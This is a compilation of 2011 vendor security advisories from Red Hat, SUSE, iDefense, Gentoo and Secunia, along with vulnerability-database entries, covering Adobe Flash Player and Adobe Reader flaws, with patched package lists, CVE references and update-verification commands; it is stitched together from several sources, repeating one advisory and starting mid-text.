Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201108-0185 | CVE-2011-2416 | Adobe Flash Player and Adobe AIR Integer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2138. Adobe Flash Player and Adobe AIR Contains an integer overflow vulnerability. This vulnerability CVE-2011-2136 and CVE-2011-2138 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. iDefense Security Advisory 08.09.11
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 09, 2011
I. For more
information, please visit following website:
http://www.adobe.com/products/flashplayer/
II.
During the allocation of an array within a certain internal ActionScript
function, a size calculation may cause an integer value to overflow.
This condition may lead to the bounds of an undersized array being
overflown during a memory copy operation.
III. An attacker typically accomplishes this via
social engineering or injecting content into a compromised, trusted
site.
IV. VENDOR RESPONSE
Adobe has released a fix which addresses this issue. Information about
downloadable vendor updates can be found by clicking on the URLs shown.
http://www.adobe.com/support/security/bulletins/apsb11-21.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2011-2416 and CVE-2011-2136 to this issue. This is a candidate
for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
04/27/2011 Initial Vendor Notification
04/27/2011 Vendor Reply
08/09/2011 Coordinated Public Disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Vitaliy Toropov.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2011 Verisign
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Red Hat update for flash-plugin
SECUNIA ADVISORY ID:
SA45593
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45593/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
RELEASE DATE:
2011-08-12
DISCUSS ADVISORY:
http://secunia.com/advisories/45593/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45593/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Red Hat has issued an update for flash-plugin. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose sensitive information and compromise a user's system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
RHSA-2011:1144-1:
https://rhn.redhat.com/errata/RHSA-2011-1144.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
VAR-201108-0145 | CVE-2011-2139 | Adobe Flash Player and Adobe AIR Vulnerabilities that bypass the same origin policy |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
